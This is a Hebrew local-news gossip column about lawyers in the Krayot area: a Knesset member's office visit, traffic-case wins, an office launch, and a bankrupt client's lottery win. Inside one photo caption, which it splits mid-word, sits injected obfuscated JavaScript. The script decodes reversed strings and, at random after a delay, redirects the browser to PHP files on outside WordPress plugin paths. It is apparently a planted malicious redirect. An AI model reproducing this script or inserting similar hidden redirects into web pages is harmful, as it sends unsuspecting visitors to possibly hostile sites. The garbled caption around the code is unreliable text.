fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הפרקליטים: אורחת בקרית אתא, משלחת לאילת

מי התארחה אצל עו"ד מימון טולדנו בקרית אתא? מי שימש הגנה משפטית על חבורת מבלים באילת ומי כייפו בערב סטיילינג ונשנושים?
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מדור הפרקליטים של הד הקריות מביא את הרכילות המשפטית הכי חמה

איך אומרים חממה בצרפתית?

החממה החיפאית לדיור השיקה השבוע מוקד חדש לפניות עולים מצרפת בתחומי הדיור והנדל"ן בשפה הצרפתית. המוקד יעניק שירות לתושבי העיר ללא עלות וללא התחייבות ובהמשך לשאר האוכלוסיות שהחממה מסייעת להם בהצלחה רבה. את המוקד תפעיל עו"ד אוריאן שלמה מפירמת עורכי הדין M.M.G & Co, שבעצמה עשתה עלייה לישראל מצרפת לפנ כ-13 שנה, וכיום עורכת דין בתחום הנדל"ן.

אורחת חשובה מאוד

היה מעניין עד מאוד השבוע במשרדו של עו"ד מימון טולדנו בקרית אתא, עת הגיעה לביקור סגנית יו״ר הכנסת ח״כ שרן השכל מלווה בחברי מרכז מהעיר. ח"כ השכל הציגה את האני מאמין שלה ואת תמיכתה הנלהבת בריבונות ישראל ביישובים ביהודה ושומרון ובקעת הירדן. חוצמיזה, היא עומדת בראש הוועדה לקידום ואישור השימוש החוקי בקנאביס ומועמדת סיעת הליכוד לכהן כיו״ר ועדת המשנה לענייני חוץ בוועדת החוץ והביטחון של הכנסת. אכן, אשת אשכולות.

אורחת בקרית אתא. ח"כ שרן השכל ועו"ד מימון טולדנו | צילום: עצמי
אורחת בקרית אתא. ח"כ שרן השכל ועו"ד מימון טולדנו | צילום: עצמי | מדור הפרקליטים של הד הקריות

קהילה חזקה

שגרו ברכות לקבוצת הפייסבוק "עורכי דין בקריות", בניהולו של אור פרימור, שחצתה השבוע את רף 4000 החברות והחברים.
פרימור, מרוצה?
"בוודאי. מלכתחילה מטרתה של קבוצת 'עורכי דין בקריות' הייתה חיזוק קשרי העבודה של קהילת עורכי הדין כאן, בקריות. בנוסף, נבנתה מערכת היכרות שתהיה מועילה לקהל היעד הקרייתי, אז כך שאנחנו את שלנו עשינו מכל הלב וללא כל תמורה".

חיוך מאוזן לאוזן

עו"ד אמיתי בן נון מקרית חיים דילג השבוע בין מסיבות סיום לדיונים בבית המשפט, והחיוך לא מש מפניו.
עו"ד בן נון, מאושר?
"הקיץ הגיע ואיתו מסיבות הסיום וסוף השנה, וגם יש ייצוג בדיונים, שזה החלק האהוב עליי במקצוע עריכת הדין, אז לומדים לשלב בין כל הדברים והכל תמיד בחיוך גדול".

אין פסילה

עו"ד בלהה (בילי) מצגר, מומחית לענייני תעבורה, הצליחה לבטל לגמרי פסילת רשיון מינהלית לנהגת חדשה שהייתה מעורבת בתאונה ושרישיונה אמור היה להישלל ל-60 יום.

ביטלה פסילת רישיון. עו"ד בלהה מצגר | צילום: גיל נחושתן
ביטלה פסילת רישיון. עו"ד בלהה מצגר | צילום: גיל נחושתן | מדור הפרקליטים של הד הקריות

אין מאסר

ואילו עו"ד נטלי אלגברי, גם היא מומחית לענייני תעבורה, הצליחה להפחית משמעותית את העונש של נאשם בעבירות באופן חסר תקדים: מארבע שנים של פסילת רישיון ומאסר בפועל – לפסילה של 36 חודשים בלבד, ללא מאסר כלל.

הישג משפטי. עו"ד נטלי אלגברי | צילום: אלה בר
הישג משפטי. עו"ד נטלי אלגברי | צילום: אלה בר | מדור הפרקליטים של הד הקריות

האדריכל חונך

האדריכל מיקי אוטמזגין מקרית מוצקין חנך בשני השבוע את משרדו החדש במתחם שופרסל (כורדני) בקרית מוצקין. סוללה של אנשי נדל"ן בקריות, בחיפה וצפון הגיעה לברך ולטעום ממעדני הבשר שהוכנו במקום: יו"ר הוועדה המקומית לתכנון ובנייה קריות וסגן ראש עיריית קרית ביאליק, יוסי אזריאל; מהנדס העיר קרית ים, יובל ברנוב; הבעלים של חברת גלבוע, המתמחה בפרויקטים של התחדשות עירונית, ערן גלבוע ועוד רבים וטובים. את משרד עורכי הדין רולוף את יונאי, הפועל בתחום ההתחדשות העירונית ועובד בשיתוף פעולה מלא עם אוטמזגין, ייצגו עו"ד משה יונאי ועו"ד הילה סלומון, המרכזת את נושא ההתחדשות העירונית במשרד.

חונכים. האדריכל מיקי אוטמזגין ועורכי הדין הילה סלומון ומשה יונאי | צילום: עצמי
חונכים. האדריכל מיקי אוטמזגין ועורכי הדין הילה סלומון ומשה יונאי | צילום: עצמי

היי דרמה

נציגות קרייתית כמעט מקיר לקיר הדרימה השבוע לאילת, יען כי בעיר הקיט הייתה מסיבה. בילו עד כלות: תום שקד, דותן סלע, איתמר סלע ובן מקס, ואיתם, כהגנה משפטית, עו"ד אדיר צבי. היה חם ומגניב.

הדרימו לאילת. תום שקד, דותן סלע, איתמר סלע, בן מקס ועו"ד אדיר צבי | צילום: עצמי
הדרימו לאילת. תום שקד, דותן סלע, איתמר סלע, בן מקס ועו"ד אדיר צבי | צילום: עצמי

צריך פיס בחיים

המדור עדיין מתקשה להירגע מהסיפור שסיפרה לו השבוע עו"ד בת אל מנור על תיק פשיטת רגל שבטיפולה. יושבים? אז ככה. לקוח משרדה, גרוש, שהפרוטה ממש לא מצויה בכיסו, חייב כספים בגובה של כמה מאות אלפי שקלים. בנוסף לכל הצרות, ואולי בגללן, הוא חלה בסרטן. המנהל המיוחד שמונה בתיק דרש שהחייב האומלל יבטל את הוראת הקבע למפעל הפיס בסך 60 שקלים בחודש, שכן הוא ראה בכך ״מותרות״. בסופו של יום, עורכי הדין ממשרדה של מנור ניצחו ולחייב התאפשר להמשיך ולהיות מנוי במפעל הפיס. איך זה נגמר? זה נגמר בכך שהחייב זכה ב-350 אלף שקלים. בפיס, כמובן.
עו"ד מנור, צריך פיס בחיים?
"פעם ראשונה בהיסטוריה שדבר כזה קורה. מתברר שבייצוג חייבים בפשיטת רגל, צריך גם טיפת מזל".

צריך פיס בחיים. עו"ד בת אל מנור | צילום: עצמי
צריך פיס בחיים. עו"ד בת אל מנור | צילום: עצמי

ככה כשיש שתיים

שיתוף פעולה פורה ועסקה סבוכה שצלחה בין אשת העסקים והמתווכת ורד מלכה ממשרד ורד טופ נדל"ן לבין מחלקת המקרקעין בפירמת עורכי הדין לנקרי ושות', המנוהלת על ידי עו"ד ונוטריון מיכל לנקרי, הולידו יום פינוקים מהסרטים בצפון הארץ. מלכה הזמינה את עו"ד לנקרי לשיט אקסטרים, מסעדת שף וספא לקינוח. ועל זה נאמר: לא רק עבודה, כי צריך גם קצת לנשמה.

יום פינוקים בצפון. ורד מלכה ועו"ד מיכל לנקרי | צילום: עצמי
יום פינוקים בצפון. ורד מלכה ועו"ד מיכל לנקרי | צילום: עצמי

רישוי נשק

השבוע המשפטי האחרון נפתח בהרצאתה המרתקת של עו"ד יפעת שי יוספזון, שהועברה במסגרת שידורי הלייב של לשכת עורכי הדין במחוז חיפה ועסקה בסוגיות פרקטיות בתחום רישוי הנשק בישראל. משרד עורכי הדין יוספזון ושות', שתדעו, הוא המוביל בארץ בתחום רישוי הנשק שמשתלב היטב עם התחום הפלילי שבו מתמחה המשרד ב-12 שנים האחרונות.

סוגיות פרקטיות בתחום רישוי הנשק בישראל. עו"ד יפעת שי יוספזון | צילום: תומר אלבז ליוסי ביטון
סוגיות פרקטיות בתחום רישוי הנשק בישראל. עו"ד יפעת שי יוספזון | צילום: תומר אלבז ליוסי ביטון

מתרחבים

עו"ד מאור עזרן או ליתר דיוק: פירמת עורכי הדין מאור עזרן ושות', עמלים בימים אלה על הקמת סניף נוסף, זאת לאור התרחבות המשרד וקהל הלקוחות בכל רחבי הצפון: חיפה, קריות ומרכז הארץ. הישארו צמודים למדור, הוא יעדכן.

סטיילינג ופינוקים

במשרד לביא, אפרת ושות' לקחו פסק זמן מכל הלחץ והעומס בעבודה וכינסו את נשות המשרד לערב גיבוש ונשנושים. על התוכנית האמנותית הייתה הסטייליסטית מתל אביב אירית מגורה שהעבירה ערב של סטיילינג, העצמה נשית וצחוקים.

נשות משרד לביא, אפרת ושות' בערב גיבוש | צילום: עצמי
נשות משרד לביא, אפרת ושות' בערב גיבוש | צילום: עצמי

עוד רכילות משפטית כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות